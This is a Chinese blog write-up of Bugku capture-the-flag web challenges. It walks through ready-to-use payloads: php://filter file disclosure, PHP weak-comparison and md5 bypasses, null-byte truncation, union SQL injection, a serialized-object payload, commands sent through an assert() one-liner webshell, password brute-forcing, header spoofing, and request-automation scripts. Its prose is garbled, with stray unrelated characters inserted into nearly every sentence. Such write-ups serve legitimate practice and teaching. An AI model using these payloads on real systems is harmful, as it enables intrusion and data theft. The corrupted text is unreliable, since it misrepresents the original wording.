title: Bugku Web Write up
date: 2019-04-07 11:07:19
tags:
- Bugku
- Web
categories:
- CTF
- Bugku
- Web
<center>Bugku平臺的Web題的Write up,差不多刷了一遍场斑,總結一下全蝶。</center>
前言
進度稍微延遲了這么一點他爸,本來是想著前天刷完,昨天寫B(tài)log。結果碰上最后幾個注入題龄毡,有點自閉,多搞了一點時間,導致進度一拖再拖荒勇,昨天又玩了一下午游戲無所作為。想著不能再拖了闻坚,必須今天寫掉沽翔,不然過幾天忘干凈了再寫就沒意義了。所以稍微少幾個題窿凤,以后再寫吧
直接從題目開寫吧仅偎,遇到相應知識再拓展。
基礎題
0x01 Web2
點進去一堆滑稽js腳本
結合題目描述:“聽說聰明的人都能找到答案” 雳殊,直接按F12橘沥。ctrl+F搜索flag,找到夯秃。
0x02 計算器
點進題目座咆,發(fā)現(xiàn)標題是隨機數(shù)字運算驗證碼。本來還以為是要利用Session仓洼,寫python腳本提交介陶。最后居然只是前端輸入框長度被限制。
所以打開F12色建,找到輸入框前端代碼哺呜,更改輸入框最大長度,再輸入表達式計算值箕戳,彈出flag
0x03 web基礎$_GET
點進去看到題目給了源碼某残。
只需構造get請求傳入what=flag即可。payload:
http://123.206.87.240:8002/get/?what=flag
0x04 web基礎$_POST
點進去發(fā)現(xiàn)題目源碼漂羊。
與上題類似驾锰,不過是GET請求變成了POST,使用火狐插件hackbar或者其他類似插件構造post請求即可走越。
這里注意椭豫,不要直接用burp將GET改POST,親測無效旨指。如下圖示
-
不用hackbar正常的GET請求
image - 將GET直接修改成POST提交數(shù)據(jù)無效
image
這里據(jù)我個人分析赏酥,是因為直接改成POST后,服務器不知道接受的數(shù)據(jù)是什么類型谆构。所以得不到flag裸扶,于是在文件頭中加上Content-Type,得出了flag搬素,證明猜測是對的 -
文件頭加上Content-Type
image
小小總結
以后需要改POST的還是直接用hackbar吧呵晨,233~
0x05 矛盾
點擊題目后闽坡,看到源碼
分析可知愚臀,需要GET傳入num為數(shù)字1才能輸出flag,但是如果輸入純數(shù)字的話,直接不滿足if條件掖棉,進不去if語句里面咙边,就輸出不了flag狐粱。
但是這里判斷num等于1拒啰,用的是==,而不是===胯舷,就用到了php弱類型比較刻蚯,即
1 == 1miracle是為true的。弱類型比較自行參照搜索引擎桑嘶。于是可以構造payload:
http://123.206.87.240:8002/get/index1.php?num=1miracle778
0x06 web3
題目描述為: flag就在這里快來找找吧
點擊題目去炊汹,彈了一個框說flag就在這里,來找找吧
一開始還沒想到flag藏的具體位置不翩,于是只能F12,看一下源碼及http文件頭兵扬。結果發(fā)現(xiàn)彈框的那段js代碼,如下圖,原來"在這里"的意思是說在js代碼里口蝠。
直接找到flag:
``
實體解碼即可得flag:KEY{J2sa42ahJK-HS11III}
0x07 你必須讓他停下
點擊題目去器钟,如下圖,頁面一直在刷新妙蔗,圖片也是不停更換
按照圖中頁面所述傲霸,本來以為要停在彈出一個熊貓的圖片的地方,結果在頁面出等了幾秒眉反,發(fā)現(xiàn)有些圖片根本不存在昙啄,只有這一張2333~
于是打開burp,看到訪問/里,jpg的名字隨機更換寸五,而且頁面響應的地方有一個flag is here梳凛,如下圖劃線處。
所以可以使用repeat一直按Go重放梳杏,直到出現(xiàn)flag為止韧拒。
0x08 文件包含
好像題目鏈接掛了。十性。叛溢。
0x09 變量1
點擊題目,看到源碼
分析一下劲适,可以看到var_dump那里出現(xiàn)$$,存在變量覆蓋楷掉,前面正則對args進行了過濾,只能輸入[a-z][0-9][A-Z]霞势。
因為存在變量覆蓋烹植,所以我們傳入args=GLOBALS,即可達到輸出$GLOBALS數(shù)組的目的斑鸦,GLOBALS為php的超全局變量,一個包含了全部變量的全局組合數(shù)組草雕。
0x10 web5
題目描述:JSPFUCK??????答案格式CTF{**}
點進題目并查看源碼鄙才,發(fā)現(xiàn)一堆js混淆過的jsfuck。
復制下來直接輸入F12控制臺即可得到flag促绵,再將ctf改為大寫即可
0x11 頭等艙
點進題目如圖,源代碼里也找不到啥東西
結合題目:頭等艙 猜測flag藏在http頭里
于是直接在響應的Headers里面找到
初級題
0x12 網(wǎng)站被黑
點進題目去,是一個如下圖示界面,源代碼嘴纺、HTTP頭都沒找到什么東西
結合題目意思败晴,網(wǎng)站被黑,說不定留下了什么后門栽渴。
于是用御劍(或者其他工具)掃一下后臺,發(fā)現(xiàn)shell.php
訪問一下尖坤,看到一個登錄框,隨便輸個密碼,出現(xiàn)如圖所警告
到這一步的話闲擦,沒有其他提示慢味,只能先通過萬能密碼看看能不能繞過登錄,不能的話再暴力破解
用萬能密碼繞過失敗墅冷,嘗試Burp暴力破解纯路,Burp暴力破解具體操作自行百度,或者參考我之前發(fā)的Dvwa暴力破解
暴力破解選擇simple list里的password字典進行爆破
得到密碼為hack
輸入密碼即可得flag
0x13 管理員系統(tǒng)
點進題目如圖示,使用萬能密碼測試登錄寞忿,提示說IP不允許訪問驰唬,聯(lián)系本地管理員登錄
于是添加XXF(X-Forwarded-For)=127.0.0.1進行登錄嘗試,提示說密碼不對
從上面嘗試知道腔彰,萬能密碼不管用叫编,所以密碼可能藏在某個地方(也是湊巧發(fā)現(xiàn)233~)
查看源代碼,發(fā)現(xiàn)有一行詭異的base64注釋霹抛,解碼可得內容為
test123
于是用admin&test123進行登錄搓逾,同時添加XXF頭,得到flag
0x14 web4
題目如圖示
按提示查看源代碼杯拐,如圖發(fā)現(xiàn)一段被url編碼的js腳本
將這段代碼進行解碼霞篡,如圖示
通過閱讀源碼分析,只要在輸入框輸入
67d709b2b54aa2aa648cf6e87a7114f1即可得到flag
0x15 flag在index里
題目如圖示
點擊鏈接后跳轉到如圖示地址
很明顯存在文件包含藕施,結合題目標題 flag在index里寇损,構造payload:
http://123.206.87.240:8005/post/index.php?file=php://filter/read/convert.base64-encode/resource=index.php獲取index.php源碼將獲取到的base64解碼后得到網(wǎng)頁源碼,找到flag
0x16 輸入密碼查看flag
題目如圖
很明顯,用Burp暴力破解,得到密碼為13579
輸入得flag:
flag{bugku-baopo-hah}
0x17 點擊一百萬次
題目hints為:JavaScript
題目如圖裳食,每點擊這個圖片一次矛市,數(shù)量加1,當數(shù)量為100萬的時候出來flag
顯然诲祸,不可能為了一個flag浪費一個鼠標233~
結合題目給的hints浊吏,于是查看前端關于點擊的js代碼
分析可知而昨,點擊一次clicks加1,當clicks大于100萬的時候找田,提交一個表單歌憨,value等于clicks的值,所以我們直接POST提交clicks即可墩衙。
0x18 備份是個好習慣
點擊題目如圖示,出現(xiàn)一段hash編碼
乍一看還以為是md5务嫡,算了下長度,發(fā)現(xiàn)是64位漆改,但是前32位跟后32位是相同的心铃。感覺有點奇怪,于是把前32位md5解密一下挫剑,發(fā)現(xiàn)是個空密碼去扣。所以這段編碼估計是沒有什么用了。那應該怎么做呢?
題目描述是備份是個好習慣猜測可能是備份文件泄露漏洞樊破。于是訪問index.php.bak愉棱,可以下載。于是打開備份文件查看源碼
分析一下哲戚,這里代碼意思是奔滑,第11行獲取url ?及?后的字符串,第12行去除?,第13行剩下字符串中的key替代成'',第14行解析字符串,即將 key1=234&key2=123解析成key2=123惫恼。
到了這里就應該明白了档押,主要考察兩個點,第一是13行處祈纯,繞過str_replace令宿。繞過之后,來到第二處腕窥,md5弱類型比較粒没。
對于第一個點,可以使用雙寫繞過簇爆,第二個點的話癞松,可以利用兩個字符串md5都是0e開頭繞過,或者將key1 key2賦為兩個不同數(shù)組進行繞過(md5不能對數(shù)組進行操作入蛆,會返回null=null)
payload1: http://123.206.87.240:8002/web16/index.php?kekeyy1=QNKCDZO&kekeyy2=aabg7XSs
payload2:
http://123.206.87.240:8002/web16/index.php?kekeyy1[]=1&kekeyy2[]=12
0x19 成績單
打開題目鏈接后,題目如圖示
簡單的輸入 1'响蓉、1'#測試后,發(fā)現(xiàn)存在sql注入漏洞哨毁,于是開始進行注入
-
用order by測試出有4個字段
image -
union查看一下哪些字段可顯示
image -
爆表
image -
爆fl4g表的列
image -
爆flag值
image
入門題
0x20 秋名山老司機
點進鏈接枫甲,題目如圖示
請在兩秒內計算車速,很明顯要用到python腳本。但計算出車速來應該怎么提交呢?于是多刷新幾遍,發(fā)現(xiàn)題目偶爾會變成下圖示想幻,里面講到了通過post提交參數(shù)value
于是寫一個python腳本
#!/usr/bin/env python3
# coding=UTF-8
'''
@Author: Miracle778
@LastEditors: Miracle778
@Description: file content
@Date: 2019-04-01 10:24:57
@LastEditTime: 2019-04-01 12:59:49
'''
import requests
from bs4 import BeautifulSoup
s = requests.Session()
r = s.get('http://123.206.87.240:8002/qiumingshan/')
soup = BeautifulSoup(r.text,'html.parser')
exp = soup.find_all('div')[0].string[:-3]
# print(exp)
value = {'value':eval(exp)}
r = s.post('http://123.206.87.240:8002/qiumingshan/',data=value)
print(r.text)
利用bs4提取表達式并計算粱栖。然后使用POST提交
運行腳本即可得flag
0x21 速度要快
題目點進去如圖示
沒找到別的信息。
用burp看一下http頭部跟頁面源碼脏毯,發(fā)現(xiàn)下圖示信息闹究。
上圖注釋信息說明需要POST提交參數(shù)margin的值,margin的值估計就是頭部中的flag食店。
將頭部中的flag base64解密一下得到如下信息
于是進行POST提交 margin=NDk4MDQ2,用火狐hackbar提交后渣淤,提示說不夠快
既然手工不夠快,那就用python跑一下吧吉嫩。
#!/usr/bin/env python
# coding=UTF-8
'''
@Author: Miracle778
@LastEditors: Miracle778
@Description: file content
@Date: 2019-04-01 13:06:09
@LastEditTime: 2019-04-04 20:48:35
'''
import requests
import base64
s = requests.Session()
r = s.get('http://123.206.87.240:8002/web6/')
flag_header = r.headers['flag'].encode('utf-8')
flag_message = base64.b64decode(flag_header).decode('utf-8')
tmp_list = flag_message.split(': ')
margin = base64.b64decode(tmp_list[-1].encode('utf-8')).decode()
data = {'margin':margin}
r = s.post("http://123.206.87.240:8002/web6/",data=data)
print(r.text)
跑一下砂代,出來結果
0x22 cookies欺騙
打開題目鏈接頁面如下
頁面一段字符,看上去也不像什么編碼率挣。于是找http頭部看看有沒有啥提示。但找了一圈并沒有發(fā)現(xiàn)露戒。
但是看到訪問url時椒功,發(fā)現(xiàn)有的貓膩,url兩個參數(shù)智什,一個line动漾、另一個filename,filename的值還用base64加密了一手荠锭。
于是將filename的值解密一下看看旱眯,解密結果為keys.txt。
直接訪問keys.txt看一下证九。與前面內容一樣
所以可以得出結論删豺,前面index.php的兩個參數(shù)line和filename可以用來讀取網(wǎng)頁源文件,于是將index.php用base64加密愧怜,line從0開始呀页,將index.php一行行讀出來。避免繁瑣拥坛,可以寫個python腳本蓬蝶。
#!/usr/bin/env python
# coding=UTF-8
'''
@Author: Miracle778
@LastEditors: Miracle778
@Description: 導出生成index.php
@Date: 2019-04-01 13:37:02
@LastEditTime: 2019-04-01 14:01:33
'''
import requests
url = 'http://123.206.87.240:8002/web11/index.php'
# url.format(2)
data = {'filename':'aW5kZXgucGhw'}
res = ''
# r = requests.get(url+'?line=100',params=data)
for i in range(100):
data['line'] = i
r = requests.get(url,params=data)
if r.text == '':
break
res += r.text
f = open('./Bugku/Web/cookies欺騙/index.php','w')
f.write(res)
f.close
得到index.php源碼
由index.php源碼可知,只能通過filename讀取file_list數(shù)組里的文件猜惋,而如果想讀取keys.php的話丸氛,就需要構造cookie使得$_COOKIE['margin']=='margin'成立。
于是再寫一個python腳本著摔,添加上Cookie值缓窜,將keys.php再導出來
#!/usr/bin/env python
# coding=UTF-8
'''
@Author: Miracle778
@LastEditors: Miracle778
@Description: 導出keys.php
@Date: 2019-04-01 14:01:56
@LastEditTime: 2019-04-01 14:11:45
'''
import requests
url = 'http://123.206.87.240:8002/web11/index.php'
# 設置cookie不通過header
# header = {'Cookie':{"margin":"margin"}}
cookie = {'margin':'margin'}
data = {'filename':'a2V5cy5waHA='}
res = ''
for i in range(100):
data['line'] = i
r = requests.get(url,params=data,cookies=cookie)
if r.text == '':
break
res += r.text
# print(res)
f = open('./Bugku/Web/cookies欺騙/keys.php','w')
f.write(res)
f.close
keys.php的源碼如下圖
得到flag
0x23 never give up
點進題目去,如圖示
流程走一遍,查看源碼及http頭雹洗,在源碼處發(fā)現(xiàn)提示:1p.html
訪問一下香罐,發(fā)現(xiàn)直接被重定向了。
于是只好查看1p.html的源代碼,發(fā)現(xiàn)一段編碼
解密后得到下面代碼
var Words ="<script>window.location.;</script>
<!--JTIyJTNCaWYlMjglMjElMjRfR0VUJTVCJTI3aWQlMjclNUQlMjklMEElN0IlMEElMDloZWFkZXIlMjglMjdMb2NhdGlvbiUzQSUyMGhlbGxvLnBocCUzRmlkJTNEMSUyNyUyOSUzQiUwQSUwOWV4aXQlMjglMjklM0IlMEElN0QlMEElMjRpZCUzRCUyNF9HRVQlNUIlMjdpZCUyNyU1RCUzQiUwQSUyNGElM0QlMjRfR0VUJTVCJTI3YSUyNyU1RCUzQiUwQSUyNGIlM0QlMjRfR0VUJTVCJTI3YiUyNyU1RCUzQiUwQWlmJTI4c3RyaXBvcyUyOCUyNGElMkMlMjcuJTI3JTI5JTI5JTBBJTdCJTBBJTA5ZWNobyUyMCUyN25vJTIwbm8lMjBubyUyMG5vJTIwbm8lMjBubyUyMG5vJTI3JTNCJTBBJTA5cmV0dXJuJTIwJTNCJTBBJTdEJTBBJTI0ZGF0YSUyMCUzRCUyMEBmaWxlX2dldF9jb250ZW50cyUyOCUyNGElMkMlMjdyJTI3JTI5JTNCJTBBaWYlMjglMjRkYXRhJTNEJTNEJTIyYnVna3UlMjBpcyUyMGElMjBuaWNlJTIwcGxhdGVmb3JtJTIxJTIyJTIwYW5kJTIwJTI0aWQlM0QlM0QwJTIwYW5kJTIwc3RybGVuJTI4JTI0YiUyOSUzRTUlMjBhbmQlMjBlcmVnaSUyOCUyMjExMSUyMi5zdWJzdHIlMjglMjRiJTJDMCUyQzElMjklMkMlMjIxMTE0JTIyJTI5JTIwYW5kJTIwc3Vic3RyJTI4JTI0YiUyQzAlMkMxJTI5JTIxJTNENCUyOSUwQSU3QiUwQSUwOXJlcXVpcmUlMjglMjJmNGwyYTNnLnR4dCUyMiUyOSUzQiUwQSU3RCUwQWVsc2UlMEElN0IlMEElMDlwcmludCUyMCUyMm5ldmVyJTIwbmV2ZXIlMjBuZXZlciUyMGdpdmUlMjB1cCUyMCUyMSUyMSUyMSUyMiUzQiUwQSU3RCUwQSUwQSUwQSUzRiUzRQ==-->"
function OutWord()
{
var NewWords;
NewWords = unescape(Words);
document.write(NewWords);
}
OutWord();
其余代碼無關緊要时肿,作用就是進行重定向庇茫。真正有用的是<!--里這段base64編碼,將這段編碼先base64再url解碼得到下面代碼螃成。
";if(!$_GET['id'])
{
header('Location: hello.php?id=1');
exit();
}
$id=$_GET['id'];
$a=$_GET['a'];
$b=$_GET['b'];
if(stripos($a,'.'))
{
echo 'no no no no no no no';
return ;
}
$data = @file_get_contents($a,'r');
if($data=="bugku is a nice plateform!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)
{
require("f4l2a3g.txt");
}
else
{
print "never never never give up !!!";
}
?>
到這里就很明顯了旦签,傳入a,b,id三個參數(shù),分別滿足if條件即可
在這里寸宏,a利用的是文件包含宁炫,用php://input協(xié)議傳入數(shù)據(jù);b利用ereg函數(shù)的%00截斷以同時滿足eregi("111".substr(b,0,1)!=4這兩個矛盾點;還有一個id == 0容易被忽略,本來我以為直接id=0就能繞過氮凝,這個條件是不是太簡單了羔巢。后面發(fā)現(xiàn)id = 0的話,!$_GET['id']就滿足了罩阵,直接退出竿秆,根本就到不了后面,所以id還要利用一手php弱類型比較
所以最終payload為:
url: http://123.206.87.240:8006/test/hello.php?id=0miracle778&a=php://input&b=%001234566
post:bugku is a nice plateform!
當然也可以直接訪問f4l2a3g.txt,233
0x24 welcome to bugkuctf
點進題目去,F(xiàn)12審查一下元素
發(fā)現(xiàn)代碼阻肿,簡單審計后,發(fā)現(xiàn)可以文件包含匪燕。構造payload
url:
http://123.206.87.240:8006/test1//test1/?txt=php://input&file=php://filter/read/convert.base64-encode/resource=hint.phppost: welcome to the bugkuctf
得到hint.php源碼
<?php
class Flag{//flag.php
public $file;
public function __tostring(){
if(isset($this->file)){
echo file_get_contents($this->file);
echo "<br>";
return ("good");
}
}
}
?>
這里得到信息還是不夠完善,于是將上面payload中的file更改一下喧笔,將index.php源碼讀出來
<?php
$txt = $_GET["txt"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($txt)&&(file_get_contents($txt,'r')==="welcome to the bugkuctf")){
echo "hello friend!<br>";
if(preg_match("/flag/",$file)){
echo "不能現(xiàn)在就給你flag哦";
exit();
}else{
include($file);
$password = unserialize($password);
echo $password;
}
}else{
echo "you are not the number of bugku ! ";
}
?>
由index.php代碼分析來看帽驯,flag應該藏在flag.php里,但是通過文件包含應該是出不來书闸,因為include前進行了一步正則匹配界拦,file參數(shù)值不能含flag,雙寫flag也沒能繞過去梗劫。
所以文件包含是得不到flag的享甸,往下看,發(fā)現(xiàn)password);終于第三個參數(shù)用到了梳侨。這里存在反序列化漏洞蛉威。具體參考:php反序列化漏洞
于是可以構造payload
url:
http://123.206.87.240:8006/test1/?txt=php://input&file=hint.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}post:
welcome to the bugkuctf
0x25 過狗一句話
題目描述:
<?php
$poc="a#s#s#e#r#t";
$poc_1=explode("#",$poc);
$poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5];
$poc_2($_GET['s'])
?>
實際就是 assert($_GET['s']) 一句話木馬
所以可以傳入 s=cmd 進行命令執(zhí)行
于是構造 s=print_r(scandir('./')) 進行文件掃描。
看到一個flag_xx.txt
直接訪問即可
或者構造 s=print_r(readfile('./flag_sm1skla1.txt'))讀取
2019/4/8 更
0x26 字符走哺?正則蚯嫌?
題目鏈接進去,發(fā)現(xiàn)給了代碼,這就好辦了择示,把代碼看懂就好了束凑。
這里的意思是GET傳入id的值進行一個正則匹配,匹配的話就能得到flag栅盲。直接給個鏈接學一波PHP正則
構造符合條件的payload:
keyAAkeyAAAAkey:/A/AAkeya@得到flag
0x27 login1(SKCTF)
題目hint說是 SQL約束攻擊
點進去看到是一個管理系統(tǒng)登錄框
試了下萬能密碼汪诉,發(fā)現(xiàn)繞不過去,然后發(fā)現(xiàn)有注冊功能谈秫,隨便注冊一個賬號扒寄,用注冊的賬號進行登錄,發(fā)現(xiàn)提示說不是管理員不能看flag
然后理所當然的去注冊admin賬號拟烫,不出意外的果然提示說admin已存在
我做的時候是沒有看到hint的该编,于是自然而然想是不是可以通過sql注入,注入update語句修改admin密碼硕淑,從而達到目的课竣。后面自然是失敗了。后面實在沒辦法置媳,只能去看看別人的WP了稠氮,結果才發(fā)現(xiàn)有hint,2333~,以后一定要仔細看題目半开。
那提示是說SQL約束攻擊,于是百度一下赃份。基于約束的SQL攻擊
使用'admin '做用戶名進行注冊登錄即可寂拆。
0x28 你從哪里來
題目進去是一句話 :are you from google?
很容易就聯(lián)想到更改http頭部,增加Referer
0x29 md5 collision(NUPT_CTF)
這個題目之前在南郵網(wǎng)絡攻防平臺上做過抓韩,不過那邊給了代碼纠永,這里代碼提示什么都沒給,只有一個please input a谒拴,有點尷尬尝江,這里雖然知道怎么做,但是還是不寫好了英上。
0x30 程序員本地網(wǎng)站
題目進去說請從本地訪問···
感覺有點瓜皮炭序,這題目做著做著又回到前面幾題簡單題一樣了。
直接修改XXF頭為127.0.0.1即可苍日。圖都懶得截了惭聂。
0x31 各種繞過
題目進去又給代碼。
分析一下相恃,id 可以url雙重編碼繞過辜纲,uname和passwd只能用sha1對數(shù)組操作返回Null來繞過了。
這里注意passwd使用post提交的,之前0x04的時候說過耕腾,post請求還是用hackbar提交吧见剩。
這里也是,用burp直接提交是得不到flag的扫俺。
還是要用hackbar提交一手
小小總結
新版火狐的hackbar也有個小缺點苍苞,就是post提交數(shù)據(jù)的時候,一定要有參數(shù)名牵舵,也就是說遇上php://input這種的話柒啤,Execute不動,post不了數(shù)據(jù)畸颅。
所以做個小總結担巩,遇見php://input用burp,遇見post name=value這種用hackbar没炒,遇見兩者皆有涛癌,那就用burp改GET為POST,手動加Content-Type。
0x32 web8
題目描述:txt送火?拳话??种吸?
題目進去又有代碼看
很明顯了弃衍,看到file_get_contents就要想到php://input
最后payload
url:
http://123.206.87.240:8002/web8/?ac=Miracle778&fn=php://inputpost:
Miracle778
0x33 細心
題目描述:想辦法變成admin
題目進去如下圖
網(wǎng)頁源代碼及http頭找了一遍沒找到啥信息或提示
于是直接掃后臺吧。不過掃之前可以先試試robots.txt存不存在
這里是存在的坚俗,訪問一下看看,發(fā)現(xiàn)存在一個resusl.php
訪問一下镜盯,得到下圖頁面
看到 管理員、IP這兩個字猖败,都顧不得別的速缆,弄得我直接改XXF頭為127.0.0.1,然并卵恩闻,并無任何作用艺糜。后面仔細分析,看到那句代碼 if(password),感覺有點奇怪幢尚,這password鬼知道是誰破停。。后面回看一下題目尉剩,題目叫細心辱挥,描述說想辦法變成admin,么得辦法边涕,把admin當password提交一手晤碘,還真就爆出來flag了褂微。
分界線 今天就到這~~
擇日再更
